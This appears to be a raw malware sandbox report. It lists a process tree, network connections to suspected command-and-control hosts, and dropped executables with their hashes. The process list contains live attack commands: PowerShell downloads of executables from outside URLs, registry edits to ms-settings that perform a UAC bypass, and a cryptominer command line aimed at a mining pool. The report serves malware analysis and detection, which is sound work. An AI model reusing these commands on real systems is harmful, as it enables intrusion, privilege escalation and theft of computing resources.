C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe
"C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe
"C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
C:\Users\Admin\AppData\Local\Temp\e59ca0d\TikTok18.exe
run=1 shortcut="C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c .\TikTok18.bat
C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
"C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";
C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
"C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
"C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6408 -ip 6408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1372 -ip 1372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 1540
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
"C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1304 -ip 1304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 1496
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe;
C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe
C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe ;
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7901.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe
"C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 9052 -ip 9052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9052 -s 300
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7901.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| CN | 159.75.51.64:50051 | 159.75.51.64 | tcp |
| US | 8.8.8.8:53 | 49.194.101.151.in-addr.arpa | udp |
| HK | 18.163.238.67:80 | 18.163.238.67 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| NL | 85.31.47.135:80 | 85.31.47.135 | tcp |
| US | 8.8.8.8:53 | utorrent-backup-server4.top | udp |
| BG | 87.121.86.16:80 | utorrent-backup-server4.top | tcp |
| US | 8.8.8.8:53 | sodiumlaurethsulfatedesyroyer.com | udp |
| US | 172.67.202.26:443 | sodiumlaurethsulfatedesyroyer.com | tcp |
| BG | 87.121.86.206:80 | 87.121.86.206 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| US | 158.101.35.62:9000 | 158.101.35.62 | tcp |
| US | 8.8.8.8:53 | 62.35.101.158.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | api.notion.com | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| GB | 142.250.187.234:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 142.250.187.234:443 | ogads-pa.googleapis.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 16.15.177.69:443 | bbuseruploads.s3.amazonaws.com | tcp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 20.83.148.22:80 | www.ilikedemos.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| NL | 85.31.47.143:39001 | venom.underground-cheat.com | tcp |
| US | 20.83.148.22:80 | api.notion.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| US | 20.83.148.22:80 | api.notion.com | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| NL | 85.31.47.135:80 | cheat.underground-cheat.com | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 16.15.184.85:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 20.83.148.22:80 | www.ilikedemos.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | 33nws.com.com | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 20.83.148.22:80 | api.notion.com | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | 20.83.148.22 | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| NL | 85.31.47.143:3333 | venom.underground-cheat.com | tcp |
| NL | 85.31.47.143:39001 | venom.underground-cheat.com | tcp |
| NL | 85.31.47.143:39001 | venom.underground-cheat.com | tcp |
Files
memory/5464-0-0x00007FFBF9D73000-0x00007FFBF9D75000-memory.dmp
memory/5464-1-0x0000000000EA0000-0x0000000000EA8000-memory.dmp
memory/5464-2-0x00007FFBF9D70000-0x00007FFBFA832000-memory.dmp
memory/5464-3-0x00007FFBF9D73000-0x00007FFBF9D75000-memory.dmp
memory/5464-4-0x00007FFBF9D70000-0x00007FFBFA832000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe
| MD5 | 718d9132e5472578611c8a24939d152d |
| SHA1 | 8f17a1619a16ffbbc8d57942bd6c96b4045e7d68 |
| SHA256 | 09810b0365c5ac275cca1a45ea00b00fdca819b7f10ce2c8a6a50a456d9e1ced |
| SHA512 | 6ae73ad6156bafa2e3f9a2b3466bca4d0a38d562b40aa29a84b6c9fe9380d2f99d73235b5d70208d6f2a3f607710eebf8c4daed6d387add0d933933fdd8c05de |
C:\Users\Admin\AppData\Local\Temp\a\URGMwM6.exe
| MD5 | e3eb0a1df437f3f97a64aca5952c8ea0 |
| SHA1 | 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a |
| SHA256 | 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521 |
| SHA512 | 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf |
C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe
| MD5 | 169a647d79cf1b25db151feb8d470fc7 |
| SHA1 | 86ee9ba772982c039b070862d6583bcfed764b2c |
| SHA256 | e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708 |
| SHA512 | efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925 |
memory/2560-34-0x0000025AB0E80000-0x0000025AB109C000-memory.dmp
memory/2560-35-0x00007FFBF9D70000-0x00007FFBFA832000-memory.dmp
memory/2560-36-0x00007FFBF9D70000-0x00007FFBFA832000-memory.dmp
memory/2560-37-0x0000025ACB810000-0x0000025ACB9AE000-memory.dmp
memory/2560-53-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-51-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-77-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-93-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-95-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-101-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-99-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-97-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-91-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-89-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
| MD5 | 2d79aec368236c7741a6904e9adff58f |
| SHA1 | c0b6133df7148de54f876473ba1c64cb630108c1 |
| SHA256 | b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35 |
| SHA512 | 022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538 |
memory/4508-205-0x0000000000400000-0x000000000066D000-memory.dmp
memory/2560-87-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-85-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-83-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-81-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-79-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-75-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-73-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-72-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-63-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-61-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-59-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
| MD5 | 3050c0cddc68a35f296ba436c4726db4 |
| SHA1 | 199706ee121c23702f2e7e41827be3e58d1605ea |
| SHA256 | 6bcddc15bc817e1eff29027edc4b19ef38c78b53d01fb8ffc024ad4df57b55c2 |
| SHA512 | b95c673a0c267e3ba56ffa26c976c7c0c0a1cc61f3c25f7fc5041919957ad5cb3dfe12d2a7cc0a10b2db41f7e0b42677b8e926d7b4d8679aadbd16976bd8e3ca |
memory/2560-57-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-49-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-47-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-45-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-43-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-41-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-40-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-38-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-69-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-67-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-65-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/2560-55-0x0000025ACB810000-0x0000025ACB9A8000-memory.dmp
memory/4608-1234-0x0000000000FA0000-0x0000000000FF6000-memory.dmp
memory/2560-1235-0x0000025ACBAB0000-0x0000025ACBBBE000-memory.dmp
memory/4608-1237-0x00000000032D0000-0x00000000032D6000-memory.dmp
memory/2560-1236-0x0000025ACBBC0000-0x0000025ACBC0C000-memory.dmp
memory/4608-1238-0x0000000001930000-0x0000000001992000-memory.dmp
memory/4608-1239-0x0000000009E00000-0x0000000009E9C000-memory.dmp
memory/4608-1240-0x000000000A450000-0x000000000A9F6000-memory.dmp
memory/4608-1241-0x0000000005A90000-0x0000000005B22000-memory.dmp
memory/4608-1242-0x0000000005A00000-0x0000000005A06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\random.exe
| MD5 | 885e6fcd0b6139ddb438d6db924465e4 |
| SHA1 | 41aef5b16d0bf65a18779a0171c093bf19ab2d76 |
| SHA256 | 005c6b318c758f7e6f3177d07ef6e4e4b30ff2109e44534cd7b17340549d6e94 |
| SHA512 | 82257aa2f61bebfb04e85754727301075007ede1b8bb642ac4a8df81a3217a1f62a0af426ae8e51dab1d61d0d04d382799e2c04add35c0137c97e4b598d2ceb0 |
memory/1372-1259-0x0000000000400000-0x00000000008B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\unik.exe
| MD5 | 8d4744784b89bf2c1affb083790fdc88 |
| SHA1 | d3f5d8d2622b0d93f7ce5b0da2b5f4ed439c6ec5 |
| SHA256 | d6a689c92843fce8cbd5391511ed74f7e9b6eb9df799626174a8b4c7160bea75 |
| SHA512 | b3126463c8d5bb69a161778e871928dc9047b69bfcb56b1af91342034a15e03a1e5a0ccea4ba7334a66a361842e8241046e00500626613a00cb5bec891436641 |
memory/1304-1271-0x0000000000400000-0x00000000008BA000-memory.dmp
memory/2560-1272-0x00007FFBF9D70000-0x00007FFBFA832000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe
| MD5 | 45fe36d03ea2a066f6dd061c0f11f829 |
| SHA1 | 6e45a340c41c62cd51c5e6f3b024a73c7ac85f88 |
| SHA256 | 832640671878e0d9a061d97288ffaae303ba3b4858ed5d675c2170e7770ec8a6 |
| SHA512 | c8676bd022fae62a2c03932dd874da8482168698fc99987c8d724b5302f75131839b5b3b6f8288b823c5bb732918f6bc49c377116bb78825807de45b6a10026f |
memory/2560-1289-0x00007FFBF9D70000-0x00007FFBFA832000-memory.dmp
memory/5896-1290-0x00007FF714330000-0x00007FF714F80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test28.exe
| MD5 | 1fa166752d9ff19c4b6d766dee5cce89 |
| SHA1 | 80884d738936b141fa173a2ed2e1802e8dfcd481 |
| SHA256 | 8978e8d5c2cdf2620aa5541469ac7f395c566d7349f709c1d23dda48a0eda0d0 |
| SHA512 | 5a2e8376a1408d44d025c02b27f5e6f24c14671f72677d918bf88e37e5800674cf576dd7bda8ecf08ea50d1cbeadb555abe8796421667408f3f2c5b42475ba7b |
C:\Users\Admin\AppData\Local\Temp\a\test26.exe
| MD5 | b9054fcd207162b0728b5dfae1485bb7 |
| SHA1 | a687dc87c8fb69c7a6632c990145ae8d598113ce |
| SHA256 | db032c18992b20def16589678eb07e0d3f74e971f4efc07196d7cd70a16753bc |
| SHA512 | 76e33c6b965ffb47f0a2838ca0571134cdf32ab9f6808bc21e6ca060b4d23e15cd686bd6d57571dbc613aa6e17a3702264079f2bc411de1a72a7d1e01afc469f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KLS5OC1K\download[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
\??\pipe\crashpad_2836_XUAVRWQNGBOYIRIK
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\a\test27.exe
| MD5 | ae1904cb008ec47312a8cbb976744cd4 |
| SHA1 | 7fce66e1a25d1b011df3ed8164c83c4cc78d0139 |
| SHA256 | 819105084e3cccedac4ae2512a171657b4d731e84333a561e526d2b4c2043257 |
| SHA512 | 52b185147655bd5cd8b17547b9f76255b54f5f7d9a42b781c4b7a8b68fab172a54417c25e06da794e4cbf80786aeed441e4cbf7f3ecedbcaed652384877a5c4b |
C:\Users\Admin\AppData\Local\Temp\a\test29.exe
| MD5 | fccc38fc0f68b8d2757ee199db3b5d21 |
| SHA1 | bc38fe00ad9dd15cecca295e4046a6a3b085d94d |
| SHA256 | b9a30bd6a26cade7cd01184c4f28dd3c18da218a3df2df97d3b294b42e34ef14 |
| SHA512 | 219334ec29a50a27f3caf5a9bad1be4b6207890198da34ec55986195f477751a3063b2a782afeeef41474870696440d038e5fd0cb54df17467ffb15ba7ba83a9 |
memory/1372-1346-0x0000000000400000-0x00000000008B5000-memory.dmp
memory/2560-1355-0x0000025ACBC50000-0x0000025ACBCA4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test25.exe
| MD5 | c9942f1ac9d03abdb6fa52fe6d789150 |
| SHA1 | 9a2a98bd2666344338c9543acfc12bc4bca2469b |
| SHA256 | 19fd10efb6bdfb8821692fd86388a1feae7683a863dd4aa1288fcd8a9611b7c2 |
| SHA512 | 8544a039e9288e3b5cdfceedef140233a6ba6587989fb7dd2e491477cba89df1350d3807d44f381c9be6fe6af9a7f9fc9e15e8f1071e0de3c82f6189b08d6b41 |
memory/1608-1367-0x0000000000400000-0x00000000004CE000-memory.dmp
memory/1608-1368-0x000001C585E60000-0x000001C585E68000-memory.dmp
memory/2560-1369-0x00007FFBF9D70000-0x00007FFBFA832000-memory.dmp
memory/1608-1371-0x000001C5A00B0000-0x000001C5A01BA000-memory.dmp
memory/1304-1888-0x0000000000400000-0x00000000008BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test24.exe
| MD5 | 6afc3c2a816aed290389257f6baedfe2 |
| SHA1 | 7a6882ad4753745201e57efd526d73092e3f09ca |
| SHA256 | ad01183c262140571a60c13299710a14a8820cc71261e3c1712657b9e03f5ee1 |
| SHA512 | 802fcfa9497ed12731033d413ec1dc856d52680aec2bf9f0865095dd655a27c35130c4f5493705cba3350f79c07c4e9ac30ea5149192c67edb375dbdaec03b0c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/5896-4120-0x00007FF714330000-0x00007FF714F80000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e9bf0692ee013f2f9219e3157d76c206 |
| SHA1 | 06477c5670e44d0cc8f1b947745586f8859c346d |
| SHA256 | df676c528b7b62265d7e29107b8f388825dcdcaf160fe50c2b1c47dda2d7b6ca |
| SHA512 | 60e5cb40a70a4369bc2c9afea669a255c869e1614ed509f4edafc5d1bfc2c449b09aef373cda1d93aece3224ca501eeccf82a3cd63ec45c59581d3ec2c188551 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 11ea6244691b9d86ed3857b6935a7603 |
| SHA1 | f2a8a267d6698a845952590ca268ccaf757731c6 |
| SHA256 | 3df0e86e1af8432a122d30934f88520596af7cbed5315a022e094456b1f492da |
| SHA512 | bdefa62b01168ba73d46e69ddcf884b28ad10f58e37aa87602390d5a0a4d55d05fa93e0605e78ea4ed28a142c4606fb5817adafa11de35db21e5f76c909a5337 |
C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe
| MD5 | ac8ca19033e167cae06e3ab4a5e242c5 |
| SHA1 | 8794e10c8f053b5709f6610f85fcaed2a142e508 |
| SHA256 | d6efeb15923ac6c89b65f87a0486e18e0b7c5bff0d4897173809d1515a9ed507 |
| SHA512 | 524aa417a1bbec3e8fafaf88d3f08851b0adf439f7a3facdd712d24314796f22b5602a7340c4efdfd957ee520c490021323b7faaf9061b99f23385c3498e2b0d |
memory/1608-5418-0x000001C585E70000-0x000001C585EC6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 46e6ad711a84b5dc7b30b75297d64875 |
| SHA1 | 8ca343bfab1e2c04e67b9b16b8e06ba463b4f485 |
| SHA256 | 77b51492a40a511e57e7a7ecf76715a2fd46533c0f0d0d5a758f0224e201c77f |
| SHA512 | 8472710b638b0aeee4678f41ed2dff72b39b929b2802716c0c9f96db24c63096b94c9969575e4698f16e412f82668b5c9b5cb747e8a2219429dbb476a31d297e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fdee96b970080ef7f5bfa5964075575e |
| SHA1 | 2c821998dc2674d291bfa83a4df46814f0c29ab4 |
| SHA256 | a241023f360b300e56b2b0e1205b651e1244b222e1f55245ca2d06d3162a62f0 |
| SHA512 | 20875c3002323f5a9b1b71917d6bd4e4c718c9ca325c90335bd475ddcb25eac94cb3f29795fa6476d6d6e757622b8b0577f008eec2c739c2eec71d2e8b372cff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c416441d6846e0f34cabfe82a8295fbd |
| SHA1 | 3ab888bb7945e04a20afea12a813ab553fe945d6 |
| SHA256 | 8dcb8e2e8318958a4c66f52ff64597e1eb68cc8ffd9d4c4feae39f4e02d657b4 |
| SHA512 | 88ddb7af17fda81b5270fb0a9359ca5b70b9520bced05b8f3e91d1c905c4626e2157066cd2452cf0f3e38f9e9281abbaa480a945030a3d1d5dbf94f8e282f12d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe
| MD5 | b248e08a7a52224f0d74d4a234650c5b |
| SHA1 | 6218a3c60050b91ad99d07eb378d8027e8e52749 |
| SHA256 | 746454b0fce64c3b29b5279e2ca7c6c68a41b9b5f0cce71449f9fffe0be9cce1 |
| SHA512 | 5ef1bd0c480e635aafa517b57d5bc8dbf577c54dfac9a7887d67761e3017b6a90f5607ced3717c61db9e44833500295e978c88c64d268725aa55230e83c470a8 |
C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe
| MD5 | 70a396a9f154f9a70534b6608e92cb12 |
| SHA1 | 1a4c735936c372df4f99a3ff3a024646d16a9f75 |
